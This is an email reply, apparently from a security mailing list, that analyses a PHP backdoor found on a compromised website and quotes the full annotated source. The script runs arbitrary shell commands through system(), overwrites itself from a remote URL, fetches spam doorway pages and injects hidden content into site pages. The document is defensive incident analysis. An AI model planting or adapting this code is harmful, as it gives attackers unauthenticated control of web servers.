This is pretty heavily obscured (the variable and file names are deliberately meaningless, although nothing is actually encoded or eval'd), but the structure and some of the things it does are reminiscent of PHP web shells such as C99.
Code like:
// Remote command execution: whatever arrives in the "c" parameter (POST,
// then GET) is passed verbatim to system() with the web server's privileges;
// the "@" suppresses any PHP error output.
function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
@system($_GET['c']);
}
is a remote command-execution backdoor: whatever is sent in the `c` GET or POST
parameter is handed straight to system() and runs with the web server's
privileges, with the `@` hiding any error output. There is no authentication
anywhere in the script, and the `u` parameter makes it self-updating (it
overwrites 1.php with content fetched from an attacker-supplied path or URL),
so the operator can replace the whole thing at will.
I copied all the code you posted to a throwaway box and ran it through php at
the command line (only do this in an isolated sandbox/VM: the script runs
shell commands and writes files). If you add something like
$_POST['c'] = "ls > test.txt"; to the top of the file and run it, you'll find
no output on the page, but a nicely created test.txt file listing the
contents of the directory containing this script...
Sad to say, it looks like you were 0wned. Given the command runner and the
self-updater, treat the whole host as compromised rather than just deleting
this one file: anything could have been dropped through it.
On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <[email protected]> wrote:
> Ok, I think one of my sites may have been compromised. I found the following
> PHP script on a site, but I'm not sure what it is trying to do. Anyone else
> ever seen this script before?
>
> Adrian
>
> <?php
> // Keep running after the requesting client disconnects, with no execution
> // time limit: Gen() below fetches ten remote pages per request and writes
> // them to disk, so the operator does not want PHP's defaults to cut it short.
> ignore_user_abort(1);
> set_time_limit(0);
>
> // "cl" handler: delete the script's working files in the current directory.
> // "c" is the state file written by Gen(), "1r" the list of generated pages
> // Gen() appends to, and "log" is not written by any visible code. Return
> // values are not checked, so missing files are silently ignored.
> function Clear()
> {
> unlink("c");
> unlink("1r");
> unlink("log");
> }
>
> // "cl2" handler: undo the page injection done by MRepl()/UpKos().
> // The target page name is read from the local file "m" and resolved
> // relative to the parent directory (i.e. the site's real content, one level
> // up from where this script sits). Everything between the
> // <adsttnmq1>..<sdioyslkjs2> and <!--dd4-->..<!--dd5--> markers is removed,
> // as are anchors whose tag contains "_lm" (links to the _lm.htm pages Gen()
> // creates) and the hidden <font> wrapper; the page is written back and
> // " upt-ok" is printed. ereg_replace() is the old POSIX regex API (removed
> // in PHP 7.0), which dates the sample.
> function Clear2()
> {
> $mrd = trim(file_get_contents("m"));
> $pt = "../$mrd";
> $fin = file_get_contents($pt);
> // The (.*) groups are greedy: with several injected blocks in one page,
> // everything from the first opening marker to the last closing one goes.
> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
> $fin = ereg_replace("<!--dd4-->", "", $fin);
> $fin = ereg_replace("<!--dd5-->", "", $fin);
> $fin = ereg_replace("<font style=\"position: absolute;overflow:
> hidden;height: 0;width: 0\">", "", $fin);
> // Truncate and rewrite the original page in place.
> $fmrd = fopen($pt, "w+");
> fwrite($fmrd, $fin);
> fclose($fmrd);
> echo " upt-ok";
> }
>
> // Copy request parameter $name into $var (by reference). POST is read
> // first, but a GET value of the same name overrides it. Returns false when
> // the resulting value is the empty string, true otherwise. Used by MRepl()
> // for "mpt" and "drs".
> function GetVar($name, &$var)
> {
> $var = "";
> if (isset($_POST[$name]))
> $var = $_POST[$name];
>
> if (isset($_GET[$name]))
> $var = $_GET[$name];
>
> if (($var) =="")
> return false;
> else return true;
> }
>
> // "g" handler and the bulk of the script: fetches batches of pages from the
> // attacker's remote generator and stores them under random directory names
> // (this looks like doorway-page generation for search-engine spam; the
> // visible code only shows fetch-and-save). Inputs: "sg" is the base URL /
> // path prefix of the generator, "gm" the keyword passed to it. Persistent
> // state is kept in the local file "c" (four lines: top dir, sub dir,
> // current keyword, page counter); the path of each batch's _lm.htm page is
> // appended to "1r". Neither parameter is validated; if they are absent $sg
> // and $g are undefined and the fopen() calls below get garbage paths.
> function Gen()
> {
> // 27-character alphabet for random directory names; mt_rand(0,26) below
> // stays in range.
> $alp = "abcdefghiklmnjsweqrtyuiopzx";
> $maps = array();
> if (isset($_POST["sg"]))
> $sg = $_POST["sg"];
>
> if (isset($_GET["sg"]))
> $sg = $_GET["sg"];
>
> if (isset($_POST["gm"]))
> $g = $_POST["gm"];
>
> if (isset($_GET["gm"]))
> $g = $_GET["gm"];
>
>
> $path = "";
> // Opened for append; never explicitly closed.
> $fr = fopen("1r", "a+");
> if (file_exists("c"))
> {
> // Resume from saved state: tname / cname / curs / pid, one per line.
> $fconf = file("c");
> $tname = trim($fconf[0]);
> $cname = trim($fconf[1]);
> $curs = trim($fconf[2]);
> $pid = trim($fconf[3]);
> if ($pid == 100)
> {
> // After 100 pages: reset the counter, start a new random 3-letter
> // subdirectory and switch to the keyword supplied in this request.
> $pid = 0;
> $rnd = mt_rand(0, 999);   // assigned but never used
> $nm = "";
> for ($i=0; $i<3; $i++)
> {
> $ran = mt_rand(0,26);
> $sym = $alp[$ran];
> $nm = $nm.$sym;
> }
> $cname = $nm;
> mkdir("$tname/$cname");
> $curs = $g;
> }
> }
> else
> {
> // First run: create a random 5-letter top-level directory, write a
> // .htaccess into it whose contents are fetched from $sg."2.txt", then
> // create the first random 3-letter subdirectory.
> $rnd = mt_rand(0, 999);
> $nm = "";
> for ($i=0; $i<5; $i++)
> {
> $ran = mt_rand(0,26);
> $sym = $alp[$ran];
> $nm = $nm.$sym;
> }
> $tname = $nm;
> $pid = 0;
> $curs = $g;
> mkdir($tname);
> $fht = fopen("$tname/.htaccess", "w+");
> $htname = $sg."2.txt";
> // With allow_url_fopen enabled this reads from an http:// URL when $sg
> // is one; otherwise it is a local path. Failure is not checked.
> $fp = fopen($htname, "r");
> $fin = '';
> while (!feof($fp))
> {
> $fc = fgets($fp, 1024);
> if (!$fc) break;
> $fin .= $fc;
> }
> fclose($fp);
> fwrite($fht, $fin);
> fclose($fht);
> $rnd = mt_rand(0, 999);
> $nm = "";
> for ($i=0; $i<3; $i++)
> {
> $ran = mt_rand(0,26);
> $sym = $alp[$ran];
> $nm = $nm.$sym;
> }
> $cname = $nm;
> mkdir("$tname/$cname");
> }
> // Fetch ten pages per request from $sg."sgen.php?g=<keyword>" and save
> // each one as <tname>/<cname>/<keyword>_<n>.htm.
> $gname = $sg."sgen.php";
> for ($j=$pid; $j<$pid+10; $j++)
> {
> $fp = fopen($gname."?g=$curs", "r");
> $fin = '';
> while (!feof($fp))
> {
> $fc = fgets($fp, 1024);
> if (!$fc) break;
> $fin .= $fc;
> }
> fclose($fp);
>
> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
> fwrite($fnd, $fin);
> fclose($fnd);
> }
>
> // When the counter reaches 100, fetch the "&m=1" variant (presumably an
> // index page for the batch) as <keyword>_lm.htm and record its path in
> // "1r". $path is always "", so the recorded path begins with "/".
> if ($j==100)
> {
> $fp = fopen($gname."?g=$curs&m=1", "r");
> $fin = '';
> while (!feof($fp))
> {
> $fc = fgets($fp, 1024);
> if (!$fc) break;
> $fin .= $fc;
> }
> fclose($fp);
> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
> fwrite($fnd, $fin);
> fclose($fnd);
> $map = "$path/$tname/$cname/$curs"."_lm.htm";
> fwrite($fr,"$map\n");
> }
>
> // Persist state for the next request; $nj is the next page number.
> $fconf = fopen("c", "w+");
> fwrite($fconf, $tname."\n");
> fwrite($fconf, $cname."\n");
> fwrite($fconf, $curs."\n");
> $nj = $j;
> fwrite($fconf, $nj."\n");
> fclose($fconf);
> }
>
> // "u" handler, self-update: overwrite "1.php" (presumably the name this
> // script was installed under) with whatever can be read from the path or
> // URL given in the "u" parameter. Nothing is validated or authenticated and
> // no error is checked, so the operator can swap the backdoor for arbitrary
> // code at any time.
> function Update()
> {
> $thisname = "1.php";
> if (isset($_POST['u']))
> $u = $_POST['u'];
>
> if (isset($_GET['u']))
> $u = $_GET['u'];
>
> // Remote read when allow_url_fopen is on and $u is a URL.
> $fp = fopen($u, "r");
> $fin = '';
> while (!feof($fp))
> {
> $fc = fgets($fp, 1024);
> if (!$fc) break;
> $fin .= $fc;
> }
> fclose($fp);
>
> $fthis = fopen($thisname, "w+");
> fwrite($fthis, $fin);
> fclose($fthis);
> }
>
> // "c" handler, remote command execution: the parameter value (POST, then
> // GET) is passed verbatim to system() and runs with the web server's
> // privileges; "@" hides any PHP error output.
> function Com()
> {
> if (isset($_POST['c']))
> @system($_POST['c']);
> if (isset($_GET['c']))
> @system($_GET['c']);
> }
>
> // "uk" handler: in the page named by local file "m" (resolved relative to
> // the parent directory), turn the bare marker strings adsttnmq1 /
> // sdioyslkjs2 into the <adsttnmq1> / <sdioyslkjs2> pseudo-tags that
> // Clear2() and MRepl() match on, then write the page back.
> function UpKos()
> {
> $mrd = trim(file_get_contents("m"));
> $pt = "../$mrd";
> $fin = file_get_contents($pt);
> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
> $fmrd = fopen($pt, "w+");
> fwrite($fmrd, $fin);
> fclose($fmrd);
> }
>
>
> // "s" handler: inject hidden content into the page named by local file
> // "m" (resolved relative to the parent directory). The payload comes from
> // the "drs" request parameter (backslashes stripped) and is appended inside
> // a zero-size, absolutely-positioned <font> element between the
> // <adsttnmq1>/<sdioyslkjs2> markers, so a browser renders nothing visible
> // (presumably aimed at search-engine crawlers). Any earlier injection and
> // the closing </body></html> are removed first; the end tag re-adds them.
> function MRepl()
> {
> $mpt = "";
> $drs = "";
> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow:
> hidden;height: 0;width: 0\">";
> $endtag = "</font></body></html><sdioyslkjs2> ";
> $mrd = trim(file_get_contents("m"));
> $pt = "../$mrd";
> $fin = file_get_contents($pt);
> GetVar("mpt", $mpt);
> // remove the closing html tags
> $fin = preg_replace ("/<\/body>/i", "", $fin);
> $fin = preg_replace ("/<\/html>/i", "", $fin);
> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
> // Opens the file named by "mpt" but never reads from or closes it.
> $fp = fopen($mpt, "r");
> GetVar("drs", $drs);
> $fin = $fin.$begtag;
> $drs = str_replace("\\", "", $drs);
> $fin = $fin.$drs;
> $fin = $fin.$endtag;
> $fmrd = fopen($pt, "w+");
> fwrite($fmrd, $fin);
> fclose($fmrd);
> }
>
> // Request dispatcher. There is no authentication of any kind: the first
> // parameter present (POST or GET) in the order u, c, uk, g, s, cl, cl2
> // selects the action and the script exits afterwards. With no recognised
> // parameter it prints "<ok>", which presumably lets the operator check that
> // the backdoor is still installed.
> function Main()
> {
> // Self-update (overwrite 1.php from a path/URL).
> if (isset($_POST['u']) || isset($_GET['u']))
> {
> Update();
> exit();
> }
>
> // Arbitrary shell command.
> if (isset($_POST['c']) || isset($_GET['c']))
> {
> Com();
> exit();
> }
>
> // Convert bare markers in the target page into pseudo-tags.
> if (isset($_POST['uk']) || isset($_GET['uk']))
> {
> UpKos();
> exit();
> }
>
> // Generate a batch of pages from the remote generator.
> if (isset($_POST['g']) || isset($_GET['g']))
> {
> Gen();
> exit();
> }
>
> // Inject hidden content into the target page.
> if (isset($_POST['s']) || isset($_GET['s']))
> {
> MRepl();
> exit();
> }
>
> // Delete local state files.
> if (isset($_POST['cl']) || isset($_GET['cl']))
> {
> Clear();
> exit();
> }
>
> // Strip the injected content from the target page.
> if (isset($_POST['cl2']) || isset($_GET['cl2']))
> {
> Clear2();
> exit();
> }
>
> echo "<ok>";
>
> }
>
> // Entry point: dispatch on the request parameters and exit.
> Main();
>
> ?>
>
--
Andrew Ellis
http://blog.psych0tik.net